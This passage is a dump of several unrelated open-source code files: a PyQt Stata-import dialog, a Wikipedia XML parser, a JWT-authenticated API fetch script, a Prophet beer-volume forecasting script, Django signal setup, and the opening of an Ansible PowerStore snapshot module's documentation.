        self.updateDatasetNameLine(tag=varname)
        if not self.import_param["status"]:
            self.showDatasetPreview(data=pd.DataFrame([]))
            return
        if varname == "(全部导入)":
            # "Import all": one summary row per variable.
            temp = []
            for name_i, data_i in self.current_dataset.items():
                temp.append([name_i, data_i.shape, type(data_i)])
            preview_data = pd.DataFrame(temp, columns=["表名称", "大小", "数据格式"])
        elif not varname:
            return
        else:
            temp = self.current_dataset[varname]
            if len(self.current_dataset[varname].shape) > 2:
                # Arrays with more than two dimensions cannot be tabulated;
                # show a one-row description instead.
                temp = pd.DataFrame([{
                    "变量": varname, "数据类型": type(temp), "数据格式": temp.dtype,
                    "大小": self.current_dataset[varname].shape
                }])
            else:
                temp = pd.DataFrame(self.current_dataset[varname][0:100])
                temp.columns = ["C" + str(i + 1) for i in range(temp.shape[1])]
            preview_data = temp
        self.showDatasetPreview(data=preview_data, header=True)
# 优化完成
class ImportStataForm(ImportDialog, dataImportFormEngine):
    """Stata (.dta) import dialog."""
    def __init__(self, parent=None):
        super().__init__(parent)
        self.file_types = "*.dta"
        self.IconPath = ":/resources/icons/stata.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the dialog's event handlers."""
        self.checkBox_ifColIndex.stateChanged.connect(self.updateTableView)  # toggle: first column is the index
    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the import configuration from the UI.
        (1) header-row flag (2) dataset name (3) rows to skip (4) row limit
        (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=True,
            status=False, varname={}, dtypes={},
            # Keyword arguments forwarded verbatim to pandas.read_stata.
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "index_col": 0 if self.checkBox_ifColIndex.isChecked() else None
            }
        )
    def importDatasetReload(self):
        """
        Reload the imported data.
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        self.current_dataset[varname] = pd.read_stata(**param)
        # Stata imports one file at a time, so the variable name defaults to
        # the dataset name.
        self.getDatasetInfo()
        self.import_param.update(status=True)
    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        name = self.import_param["datasetname"]
        self.showDatasetPreview(data=self.current_dataset[name], header=True)
| pyminer/pyminer | pyminer/packages/dataio/sample.py | sample.py | py | 47,148 | python | zh | code | 77 | github-code | 36 |
31897243562 | from bs4 import BeautifulSoup
from collections import defaultdict, Counter
class Parser:
    """Static helpers for parsing word-count dumps and Wikipedia XML exports."""
    @staticmethod
    def getWordsArticle(file):
        """Read lines of the form '#word => count' and return (word, count) tuples."""
        words = []
        with open(file, encoding='utf-8') as f:
            for line in f:
                line = line.split(" => ")
                word = line[0].replace("#", "")
                count = int(line[1].replace("\n", ""))
                words.append((word, count))
        return words
    @staticmethod
    def getAllPages(file):
        """Return every <page> element of a Wikipedia XML dump."""
        # Fix: the file handle was previously left open; use a context
        # manager so it is closed promptly.
        with open(file) as handler:
            soup = BeautifulSoup(handler.read(), 'xml')
        return soup.find_all('page')
    @staticmethod
    def getText(page):
        """Return the <title> tag of a single page's markup (None if absent)."""
        soup = BeautifulSoup(page, 'html.parser')
        return soup.title
    @staticmethod
    def getRefs(text):
        """Return all <ref> tags found in the given markup."""
        soup = BeautifulSoup(text, 'html.parser')
        return soup.find_all('ref')
    @staticmethod
    def solveMatches(matches):
        """Pick the winning category from (category, distance) pairs.

        The most frequent category wins. Ties are broken by the smallest
        summed distance; a further tie keeps the last such category.
        """
        count = Counter([x[0] for x in matches]).most_common()
        # Fix: with a single distinct category, count[1] used to raise
        # IndexError. A lone category is trivially the winner, as is an
        # untied most-common one.
        if len(count) == 1 or count[0][1] != count[1][1]:
            return count[0][0]
        # Only categories tied with the most common one stay in the running.
        max_cats = [match[0] for match in count if match[1] == count[0][1]]
        # Sum the distances per tied category and take the shortest total.
        # If the totals tie as well, the last one wins.
        distance_dict = defaultdict(int)
        for k, v in matches:
            if k in max_cats:
                distance_dict[k] += v
        return Counter(distance_dict).most_common()[-1][0]
| cenh/Wikipedia-Heavy-Hitters | Parser.py | Parser.py | py | 1,600 | python | en | code | 3 | github-code | 36 |
31329677612 | import requests
from requests import HTTPError
import yaml
import json
import os
def load_config():
    """Read api_config.yaml from the current working directory as a dict."""
    config_file = os.path.join(os.getcwd(), 'api_config.yaml')
    with open(config_file, mode='r') as yaml_file:
        parsed = yaml.safe_load(yaml_file)
    return parsed
def auth():
    """Authenticate against the API and trigger the data request.

    Posts the configured credentials to the auth endpoint, builds a JWT
    bearer token from the response, and hands it to request(). On an HTTP
    error the failing URL is printed and None is returned.
    """
    conf = load_config()['api_handle']
    url = conf['url']+conf['endpoint_auth']
    data = json.dumps(conf['credentials'])
    headers = {"content-type": "application/json"}
    try:
        result = requests.post(url, data=data, headers=headers)
        result.raise_for_status()
        token = "JWT " + result.json()['access_token']
        return request(token)
    except HTTPError:
        print('Exception with:')
        # Fix: the config uses 'endpoint_auth'/'endpoint_get' keys, so the
        # old conf['endpoint'] lookup raised KeyError inside this handler.
        # Print the URL that was actually requested.
        print(url)
def get(url, date, headers):
    """GET the payload for one date; return parsed JSON, or None on HTTP error.

    The date filter is sent as a JSON request body, matching the API's
    existing contract.
    """
    try:
        result = requests.get(url
                              , data=json.dumps({"date": date})
                              , headers=headers
                              , timeout=10)
        # Fix: without raise_for_status() the HTTPError handler below was
        # unreachable and error pages fell straight through to .json().
        result.raise_for_status()
        return result.json()
    except HTTPError:
        print('Error')
        return None
def save(inp):
    """Write a day's records to data/<date>/out_<date>.json under the cwd.

    The output directory is created on first use; creation success or
    failure is reported on stdout.
    """
    date_key = inp[0]['date']
    out_dir = os.path.join(os.getcwd(), f'data/{date_key}')
    if not os.path.exists(out_dir):
        try:
            os.makedirs(out_dir)
        except OSError:
            print("Creation of the directory %s failed" % out_dir)
        else:
            print("Successfully created the directory %s" % out_dir)
    with open(f'{out_dir}/out_{date_key}.json', 'w') as out_file:
        json.dump(inp, out_file)
def request(token):
    """Fetch the configured start date's data with the given token and save it.

    Prints 'Empty Date' instead of saving when the API reports there are no
    out-of-stock items for that date.
    """
    conf = load_config()['api_handle']
    url = conf['url'] + conf['endpoint_get']
    start_date = conf['start_date']
    headers = conf['headers']
    headers['authorization'] = token
    # Fix: the original set result = None and then tested
    # isinstance(result, dict) BEFORE calling the API, so the "empty date"
    # branch was dead and the sentinel message dict could reach save().
    # Fetch first, then branch on the actual response.
    result = get(url, start_date, headers)
    if isinstance(result, dict) \
            and (result.get('message') == 'No out_of_stock items for this date'):
        print('Empty Date')
    else:
        save(result)
if __name__ == '__main__':
    # Script entry point: authenticate, then fetch and persist the data.
    auth()
| daniiche/DE | hmwrk4/airflow/dags/api_handle_airflow.py | api_handle_airflow.py | py | 1,987 | python | en | code | 0 | github-code | 36 |
34697431338 | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 20 06:20:43 2022
@author: beauw
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import itertools
from pandas import to_datetime
from prophet import Prophet
from pandas import DataFrame
from matplotlib import pyplot
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from sklearn import preprocessing
from prophet.diagnostics import cross_validation
from prophet.diagnostics import performance_metrics
from prophet.plot import plot_cross_validation_metric
from sklearn.decomposition import PCA
# Import raw data sets. Then, combine variables into one mother dataframe.
#########################################################################
# NOTE(review): every pd.read_csv() below is missing its file path (they
# appear to have been stripped); the script cannot run as-is — restore paths.
# Import demographics of customers living in the region of each wholesaler.
demographics = pd.read_csv()
# Major events - such as holidays, Superbowl, big soccer games, etc.
major_events = pd.read_csv()
# Change YearMonth to Date/Time
major_events['YearMonth'] = pd.to_datetime(
    major_events['YearMonth'], format='%Y%m')
# Historical volume of each SKU
historical_volume = pd.read_csv()
# Change YearMonth to Date/Time
historical_volume['YearMonth'] = pd.to_datetime(
    historical_volume['YearMonth'], format='%Y%m')
# Overall industry soda sales
industry_soda_sales = pd.read_csv()
# Change YearMonth to Date/Time
industry_soda_sales['YearMonth'] = pd.to_datetime(
    industry_soda_sales['YearMonth'], format='%Y%m')
# Overall industry beer volume
industry_volume = pd.read_csv()
# Change Yearmonth to Date/Time
industry_volume['YearMonth'] = pd.to_datetime(
    industry_volume['YearMonth'], format='%Y%m')
# Any promotions matched up to Year Month
price_sales_promotion = pd.read_csv()
# Change YearMonth to Date/Time
price_sales_promotion['YearMonth'] = pd.to_datetime(
    price_sales_promotion['YearMonth'], format='%Y%m')
# Average temperature of YearMonth in relation to each wholesaler's region
weather = pd.read_csv()
# Change YearMonth to Date/Time
weather['YearMonth'] = pd.to_datetime(weather['YearMonth'], format='%Y%m')
# Merge all variables that depend on SKUs into one data frame - stacking
# on top of Agency, SKU, and then YearMonth
sku_dataframe = historical_volume.merge(
    price_sales_promotion, on=['Agency', 'SKU', 'YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
    industry_soda_sales, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(
    industry_volume, on=['YearMonth'], how='left')
sku_dataframe = sku_dataframe.merge(major_events, on=['YearMonth'], how='left')
# Merge all variables that depend on Agencies (AKA distributors) by eliminating duplicates
Agency_dataframe = weather.merge(demographics, on=['Agency'], how='left')
# Let's take a look at all the Agencies
#week4_dataframe_agencies = Agency_dataframe.copy()
#week4_dataframe_agencies = week4_dataframe_agencies.groupby('Agency')
# This does not perform well in the Spyder IDE
# Merge both major dataframes (ones depending on SKUs and on Agencies) into one big dataframe
mother_dataframe = sku_dataframe.merge(
    Agency_dataframe, on=['YearMonth', 'Agency'], how='left')
# Turn the categorical SKU data into booleans columns instead. Also making
# a data frame for a PCA run (kept with the original 'SKU' column).
PCAmother_df = mother_dataframe.copy()
mother_dataframe = pd.get_dummies(
    mother_dataframe, columns=['SKU'], dummy_na=False)
# Check on null values in the newly formed large dataframe. Let's also check
# out the statistics.
mother_dataframe.isnull().sum()
# Import the testing data now...
testing_dataframe = pd.read_csv(
    r'C:\Users\beauw\OneDrive\Desktop\Machine Learning\OSU - Data Mining Project\volume_forecast.csv')
# Visualize variables graphically that may relate with volume
# plt.scatter(mother_dataframe['Avg_Max_Temp'],mother_dataframe['Volume'])
# plt.scatter(mother_dataframe['Promotions'],mother_dataframe['Volume'])
# Let's drop the Fifa World Cup and Football Gold cup due to 0 value
# contributions.
mother_dataframe.drop(
    columns=['FIFA U-17 World Cup', 'Football Gold Cup'], inplace=True)
# Making a data frame for just SKU 1 sold by Agency 1.
agency1_SKU1_df = mother_dataframe.copy()
agency1_SKU1_df.query(
    'Agency == "Agency_01" and SKU_SKU_01 == 1', inplace=True)
agency1_SKU1_df.drop('SKU_SKU_02', axis=1, inplace=True)
agency1_SKU1_df.drop('SKU_SKU_01', axis=1, inplace=True)
#####################################################################
#####################################################################
#####################################################################
# Create a heatmap of all variables - take a close note of volume correlation
# (pairwise correlations over the first 21 columns of the merged frame).
corr = mother_dataframe[mother_dataframe.columns[:21]].corr()
plt.figure(figsize=(12, 12))
sns.heatmap(corr, vmin=-1, cmap='BuPu', annot=True, fmt=".2f")
plt.show()
######################################################################
# Create a factor plot against time and volume with various variables
##THIS TAKES SERIOUS TIME AND CPU USEAGE (Thus the #s)!!
#sns.catplot(x ='YearMonth', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Price', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Promotions', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Population_2017', y ='Volume', data = mother_dataframe)
#sns.catplot(x ='Avg_Yearly_Household_Income_2017', y ='Volume', data = mother_dataframe)
# These all took a very long time to process. Saved plot pictures for later use.
######################################################################
# Find optimal number of components for ALL data using PCA. I also stacked and
# scaled the SKU data back into one column for this input.
label_encoder = preprocessing.LabelEncoder()
PCAprescaled = PCAmother_df.copy()
PCAprescaled.drop(PCAprescaled.loc[:,'Easter Day':'Music Fest'], axis=1, inplace=True)
SS = StandardScaler()
# Label-encode the categorical columns so StandardScaler can process them.
PCAprescaled['Agency'] = label_encoder.fit_transform(PCAprescaled['Agency'])
PCAprescaled['YearMonth'] = label_encoder.fit_transform(PCAprescaled['YearMonth'])
PCAprescaled['SKU'] = label_encoder.fit_transform(PCAprescaled['SKU'])
PCAscaled = SS.fit_transform(PCAprescaled)
PCAmodel = PCA(random_state=5000).fit(PCAscaled)
# Scree plot: explained variance per component.
plt.plot(PCAmodel.explained_variance_ratio_,
         linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
# Cumulative run.
plt.plot(np.cumsum(PCAmodel.explained_variance_ratio_),
         linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
# Optimal number of components for just SKU 1 and Agency 1.
PCAprescaled2 = agency1_SKU1_df.copy()
PCAprescaled2.drop(PCAprescaled2.iloc[:,8:17], axis=1, inplace=True)
PCAprescaled2.drop('Agency', axis=1, inplace=True)
SS = StandardScaler()
PCAprescaled2['YearMonth'] = label_encoder.fit_transform(PCAprescaled2['YearMonth'])
PCAscaled2 = SS.fit_transform(PCAprescaled2)
PCAmodel2 = PCA(random_state=5000).fit(PCAscaled2)
plt.plot(PCAmodel2.explained_variance_ratio_,
         linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance')
plt.show()
# Cumulative run.
plt.plot(np.cumsum(PCAmodel2.explained_variance_ratio_),
         linewidth = 4)
plt.xlabel('Components')
plt.ylabel('Explained Variance Cumulative')
plt.show()
######################################################################
# WCSS Elbow method - then plot KMeans
# After looking at WCSS, the only viable options seem to be pricing
# And promotions.
# Pricing first. I am encoding YearMonth column to include dates as variables
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq0 = mother_dataframe.copy()
label_encoder = preprocessing.LabelEncoder()
mother_df_Seq0['YearMonth'] = label_encoder.fit_transform(mother_df_Seq0['YearMonth'])
price_trans_x = mother_df_Seq0.iloc[:, [1, 2, 3]].values
Standard_Scale = StandardScaler()
# NOTE(review): the scaled result is discarded here — price_trans_x itself
# reaches KMeans unscaled. Confirm whether this was intended.
Standard_Scale.fit_transform(price_trans_x[:,1:3])
wcss = []
for i in range(1, 11):
    pricekmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
    pricekmeans.fit(price_trans_x)
    wcss.append(pricekmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Price - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
price_y_kmeans = KMeans(n_clusters=2, init='k-means++',
                        max_iter=300, n_init=10, random_state=0)
price_z_kmeans = price_y_kmeans.fit_predict(price_trans_x)
price_u_labels = np.unique(price_z_kmeans)
print(price_u_labels)
# Plot the centroids
plt.scatter(price_trans_x[price_z_kmeans == 0, 0],
            price_trans_x[price_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(price_trans_x[price_z_kmeans == 1, 0],
            price_trans_x[price_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(price_trans_x[price_z_kmeans == 2, 0],
#price_trans_x[price_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
#plt.scatter(price_trans_x[price_z_kmeans==3, 0], price_trans_x[price_z_kmeans==3, 1], s=100, c='cyan', label ='Cluster 4')
plt.scatter(price_y_kmeans.cluster_centers_[:, 0], price_y_kmeans.cluster_centers_[
    :, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Pricing')
plt.xlabel('Pricing ')
plt.ylabel('Volume')
plt.show()
# Now Promotions..
promo_trans_x = mother_df_Seq0.iloc[:, [1, 2, 5]].values
# NOTE(review): these three calls scale single ROWS (fancy indexing selects
# rows 1, 2 and 5) and their results are discarded, so promo_trans_x reaches
# KMeans unscaled — confirm whether column scaling was intended.
Standard_Scale.fit_transform(promo_trans_x[[1]])
Standard_Scale.fit_transform(promo_trans_x[[2]])
Standard_Scale.fit_transform(promo_trans_x[[5]])
wcss = []
for i in range(1, 11):
    promokmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
    promokmeans.fit(promo_trans_x)
    wcss.append(promokmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit')
plt.xlabel('Promotions - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
# Unique labels for the cluster centroids
promo_y_kmeans = KMeans(n_clusters=2, init='k-means++',
                        max_iter=300, n_init=10, random_state=0)
promo_z_kmeans = promo_y_kmeans.fit_predict(promo_trans_x)
promo_u_labels = np.unique(promo_z_kmeans)
print(promo_u_labels)
# Plot the centroids
plt.scatter(promo_trans_x[promo_z_kmeans == 0, 0],
            promo_trans_x[promo_z_kmeans == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(promo_trans_x[promo_z_kmeans == 1, 0],
            promo_trans_x[promo_z_kmeans == 1, 1], s=100, c='blue', label='Cluster 2')
#plt.scatter(promo_trans_x[promo_z_kmeans == 2, 0],
#promo_trans_x[promo_z_kmeans == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(promo_y_kmeans.cluster_centers_[:, 0], promo_y_kmeans.cluster_centers_[
    :, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of Promotions')
plt.xlabel('Promotions')
plt.ylabel('Volume')
plt.show()
# Let's do Sales, Pricing, Promotions, Volume, Yearly Household Income, and
# Average Population via multi-Kmeans clustering. See if all these together
# does anything...
mother_df_Seq = mother_dataframe.copy()
mother_df_Seq.drop(
    mother_df_Seq.loc[:, 'Soda_Volume':'Avg_Max_Temp'], axis=1, inplace=True)
mother_df_Seq.drop(
    mother_df_Seq.loc[:, 'SKU_SKU_01':'SKU_SKU_34'], axis=1, inplace=True)
mother_df_Seq.drop('Agency', axis=1, inplace=True)
mother_df_Seq['YearMonth'] = label_encoder.fit_transform(mother_df_Seq['YearMonth'])
#mother_df_Seq.drop('YearMonth', axis=1, inplace=True)
SS = StandardScaler()
# Scale the seven remaining numeric columns together before clustering.
Blob_df = SS.fit_transform(mother_df_Seq.iloc[:,0:7])
blob_trans_x = Blob_df
wcss = []
for i in range(1, 11):
    blobkmeans = KMeans(n_clusters=i, init='k-means++', random_state=42)
    blobkmeans.fit(blob_trans_x)
    wcss.append(blobkmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit - Lotta Variables')
plt.xlabel('Lotta Variables - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
cluster_results = pd.DataFrame(Blob_df, columns=['YearMonth','Volume', 'Price', 'Sales',
                                                 'Promotions', 'Avg_Population_2017',
                                                 'Avg_Yearly_Household_Income_2017'])
blob_kmeans = KMeans(n_clusters=4)
y = blob_kmeans.fit_predict(cluster_results[['YearMonth','Volume', 'Price', 'Sales',
                                             'Promotions', 'Avg_Population_2017',
                                             'Avg_Yearly_Household_Income_2017']])
y2 = pd.DataFrame(y, columns=[0])
cluster_results['Cluster_Results'] = y2
plt.scatter(blob_trans_x[y == 0, 0],
            blob_trans_x[y == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(blob_trans_x[y == 1, 0],
            blob_trans_x[y == 1, 1], s=100, c='blue', label='Cluster 2')
plt.scatter(blob_trans_x[y == 2, 0],
            blob_trans_x[y == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(blob_trans_x[y == 3, 0],
            blob_trans_x[y == 3, 1], s=100, c='orange', label='Cluster 4')
plt.scatter(blob_kmeans.cluster_centers_[:, 0], blob_kmeans.cluster_centers_[
    :, 1], s=100, c='yellow', label='Centroids')
plt.title('Clusters of a Bunch of Variables')
plt.xlabel('Variables')
plt.ylabel('Y')
plt.show()
# KMeans now completed for Promotions and Pricing.
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
# Creating 3 separate Prophet algorithms, which will make a new dataframe
# with industry volume, soda volume, and avg temperature.
### in order to prepare Prophet for making a prediction of SKU 1 and Agency 1
prophet_feed_df = mother_dataframe.copy()
prophet_feed_soda = prophet_feed_df[['YearMonth', 'Soda_Volume']]
prophet_feed_industry = prophet_feed_df[['YearMonth', 'Industry_Volume']]
# For the weather forecast, we will need to train algorithms on all of
# agency 1's data only (regardless of SKU. Filtering out the rest of the agencies...
prophet_feed_weather = prophet_feed_df[['YearMonth', 'Avg_Max_Temp', 'Agency']]
prophet_feed_weather.query('Agency == "Agency_01"', inplace=True)
prophet_feed_weather.drop('Agency', axis=1, inplace=True)
# Assign Prophet friendly names ('ds'/'y') to variables in both data sets.
# Change time to date-time format.
prophet_feed_soda.columns = ['ds', 'y']
prophet_feed_soda['ds'] = to_datetime(prophet_feed_soda['ds'])
prophet_feed_industry.columns = ['ds', 'y']
prophet_feed_industry['ds'] = to_datetime(prophet_feed_industry['ds'])
prophet_feed_weather.columns = ['ds', 'y']
prophet_feed_weather['ds'] = to_datetime(prophet_feed_weather['ds'])
# Fit one Prophet model per driver variable.
industry_prophet = Prophet()
industry_prophet.fit(prophet_feed_industry)
soda_prophet = Prophet()
soda_prophet.fit(prophet_feed_soda)
weather_prophet = Prophet()
weather_prophet.fit(prophet_feed_weather)
# Combine all futures data and evaluate the three Prophets' predictions.
#### Build a Future forecast dataframe (the 12 months of 2018) for the soda
#### prophet predict.
sodafuture = list()
for s in range(1, 13):
    sodadate = '2018-%02d' % s
    sodafuture.append([sodadate])
sodafuture = DataFrame(sodafuture)
sodafuture.columns = ['ds']
sodafuture['ds'] = to_datetime(sodafuture['ds'])
# Build Soda Meta Prophet model.
### Insert top rated parameters for Soda model
soda_param_grid = {
    'changepoint_prior_scale': [0.0001],#This is the lowest value in MAPE reduction
    'seasonality_prior_scale': [0.001],#This is the lowest value in MAPE reduction
}
soda_all_params = [dict(zip(soda_param_grid.keys(),
                            sod)) for sod in itertools.product(*soda_param_grid.values())]
for sparams in soda_all_params:
    soda_prophet = Prophet(**sparams).fit(prophet_feed_soda)
# Make Soda prediction dataframe.
sodaforecast = soda_prophet.predict(sodafuture)
# Plot the soda volume prediction from the Soda Prophet.
soda_prophet.plot(sodaforecast)
pyplot.show()
# Evaluate performance of the Soda Prophet (rolling-origin cross validation).
soda_crossval = cross_validation(soda_prophet, initial='1095 days', period='31 days', horizon = '365 days')
soda_prophet_performance = performance_metrics(soda_crossval)
soda_fig_performance = plot_cross_validation_metric(soda_crossval, metric='mape')
# ---------------------------------------------------------------
# Industry Prophet: forecast 2018 overall beer-industry volume.
# ---------------------------------------------------------------
# Future frame: one row per month of 2018.
industryfuture = DataFrame([['2018-%02d' % month] for month in range(1, 13)])
industryfuture.columns = ['ds']
industryfuture['ds'] = to_datetime(industryfuture['ds'])
# Hyper-parameters previously found to minimise MAPE during tuning.
industry_param_grid = {
    'changepoint_prior_scale': [0.0001],
    'seasonality_prior_scale': [0.001],
}
industry_all_params = [
    dict(zip(industry_param_grid.keys(), combo))
    for combo in itertools.product(*industry_param_grid.values())
]
for iparams in industry_all_params:
    industry_prophet = Prophet(**iparams).fit(prophet_feed_industry)
# Predict and plot the 2018 industry-volume forecast.
industryforecast = industry_prophet.predict(industryfuture)
industry_prophet.plot(industryforecast)
pyplot.show()
# Cross-validate the industry model and report MAPE.
industry_crossval = cross_validation(industry_prophet, initial='1095 days',
                                     period='31 days', horizon='365 days')
industry_prophet_performance = performance_metrics(industry_crossval)
industry_fig_performance = plot_cross_validation_metric(industry_crossval,
                                                        metric='mape')
# ---------------------------------------------------------------
# Weather Prophet: forecast Agency_01's 2018 average max temperature.
# ---------------------------------------------------------------
# Future frame: one row per month of 2018.
weatherfuture = DataFrame([['2018-%02d' % month] for month in range(1, 13)])
weatherfuture.columns = ['ds']
weatherfuture['ds'] = to_datetime(weatherfuture['ds'])
# Hyper-parameters previously found to minimise MAPE during tuning.
weather_param_grid = {
    'changepoint_prior_scale': [0.01],
    'seasonality_prior_scale': [0.01],
    'holidays_prior_scale': [0.0001],
}
weather_all_params = [
    dict(zip(weather_param_grid.keys(), combo))
    for combo in itertools.product(*weather_param_grid.values())
]
for wparams in weather_all_params:
    weather_prophet = Prophet(**wparams).fit(prophet_feed_weather)
# Predict once and plot. (The original code called predict() a second
# time with the same inputs before cross-validation; that redundant
# call has been removed.)
weatherforecast = weather_prophet.predict(weatherfuture)
weather_prophet.plot(weatherforecast)
pyplot.show()
# Cross-validate the weather model and report MAPE.
weather_crossval = cross_validation(weather_prophet, initial='1095 days',
                                    period='31 days', horizon='365 days')
weather_prophet_performance = performance_metrics(weather_crossval)
weather_fig_performance = plot_cross_validation_metric(weather_crossval,
                                                       metric='mape')
#########################################################################
# Merge the three regressor forecasts into one future frame for the
# final volume model. Resulting columns: ds, Avg_Max_Temp,
# Industry_Volume, Soda_Volume -- matching the regressors registered
# on the a1s1 model below.
Futures_df = weatherforecast[['ds', 'yhat']].copy()
Futures_df = Futures_df.rename(columns={'yhat': 'Avg_Max_Temp'})
# Insert each forecast directly under its final column name (replaces
# the old insert-then-rename dance; the dead rename of a nonexistent
# 'YearMonth' column was removed).
Futures_df.insert(2, 'Industry_Volume', industryforecast['yhat'])
Futures_df.insert(3, 'Soda_Volume', sodaforecast['yhat'])
##########################################################################
# Final model: predict Agency_01 / SKU_01 volume using the three
# forecast regressors produced above.
a1s1_prophet_feed = agency1_SKU1_df[['YearMonth', 'Volume', 'Avg_Max_Temp',
                                     'Industry_Volume',
                                     'Soda_Volume']]
a1s1_prophet_feed = a1s1_prophet_feed.rename(columns={'YearMonth': 'ds',
                                                      'Volume': 'y'})
# Tuned hyper-parameters (lowest MAPE found during grid search).
a1s1_param_grid = {
    'changepoint_prior_scale': [1.6],
    'seasonality_prior_scale': [0.1],
    'changepoint_range': [0.95],
}
a1s1_all_params = [dict(zip(a1s1_param_grid.keys(), combo))
                   for combo in itertools.product(*a1s1_param_grid.values())]
for a1s1params in a1s1_all_params:
    a1s1_prophet = Prophet(**a1s1params)
    # BUG FIX: the regressors were previously registered on a throwaway
    # Prophet() instance that was discarded when the loop re-created the
    # model, so the fitted model silently ignored them. They must be
    # added to the instance that is actually fitted.
    a1s1_prophet.add_regressor('Avg_Max_Temp')
    a1s1_prophet.add_regressor('Industry_Volume')
    a1s1_prophet.add_regressor('Soda_Volume')
    a1s1_prophet.fit(a1s1_prophet_feed)
# Predict once (a second, identical predict() call was removed) and plot.
a1s1forecast = a1s1_prophet.predict(Futures_df)
a1s1_prophet.plot(a1s1forecast)
pyplot.show()
# Cross-validate the final model (31-day horizon) and report MAPE.
a1s1_crossval = cross_validation(a1s1_prophet, initial='1095 days',
                                 period='31 days', horizon='31 days')
a1s1_prophet_performance = performance_metrics(a1s1_crossval)
a1s1_fig_performance = plot_cross_validation_metric(a1s1_crossval,
                                                    metric='mape')
# Final one-month-ahead prediction.
print(a1s1forecast.head(1))
# Source: SpeciesXBeer/BeerVolumeProphet -- "Entire Beer Volume Forecase .py"
from django.apps import apps
from django.db.models.signals import post_save
from .invitation_status_changed import when_invitation_registration_post_save
from .consultant_validation_status_changed import when_consultant_validation_status_update
def setup_signals():
    """Wire the post_save handlers for Invitation and
    ConsultantValidationStatus.

    The models are resolved lazily through the app registry so this can
    run during app loading without importing the model modules directly.
    """
    invitation_model = apps.get_model(
        app_label='invitation',
        model_name='Invitation',
    )
    validation_status_model = apps.get_model(
        app_label='consultant',
        model_name='ConsultantValidationStatus',
    )
    post_save.connect(
        when_invitation_registration_post_save,
        sender=invitation_model,
    )
    post_save.connect(
        when_consultant_validation_status_update,
        sender=validation_status_model,
    )
# Source: tomasgarzon/exo-services -- service-exo-core/registration/signals/__init__.py
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils import dellemc_ansible_utils as utils
import logging
from datetime import datetime, timedelta
from uuid import UUID
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: dellemc_powerstore_snapshot
version_added: '2.6'
short_description: Manage Snapshots on Dell EMC PowerStore.
description:
- Managing Snapshots on PowerStore.
- Create a new Volume Group Snapshot,
- Get details of Volume Group Snapshot,
- Modify Volume Group Snapshot,
- Delete an existing Volume Group Snapshot,
- Create a new Volume Snapshot,
- Get details of Volume Snapshot,
- Modify Volume Snapshot,
- Delete an existing Volume Snapshot.
author:
- Rajshree Khare (Rajshree.Khare@dell.com)
- Prashant Rakheja (prashant.rakheja@dell.com)
extends_documentation_fragment:
- dellemc.dellemc_powerstore
options:
snapshot_name:
description:
- The name of the Snapshot. Either snapshot name or ID is required.
snapshot_id:
description:
- The ID of the Snapshot. Either snapshot ID or name is required.
volume:
description:
- The volume, this could be the volume name or ID.
volume_group:
description:
- The volume group, this could be the volume group name or ID.
new_snapshot_name:
description:
- The new name of the Snapshot.
desired_retention:
description:
- The retention value for the Snapshot.
- If the retention value is not specified, the snap
details would be returned.
- To create a snapshot, either retention or expiration
timestamp must be given.
- If the snap does not have any retention value - specify it as 'None'.
retention_unit:
description:
- The unit for retention.
- If this unit is not specified, 'hours' is taken as default
retention_unit.
- If desired_retention is specified,
expiration_timestamp cannot be specified.
choices: [hours, days]
expiration_timestamp:
description:
- The expiration timestamp of the snapshot. This should be provided in
UTC format, e.g 2019-07-24T10:54:54Z.
description:
description:
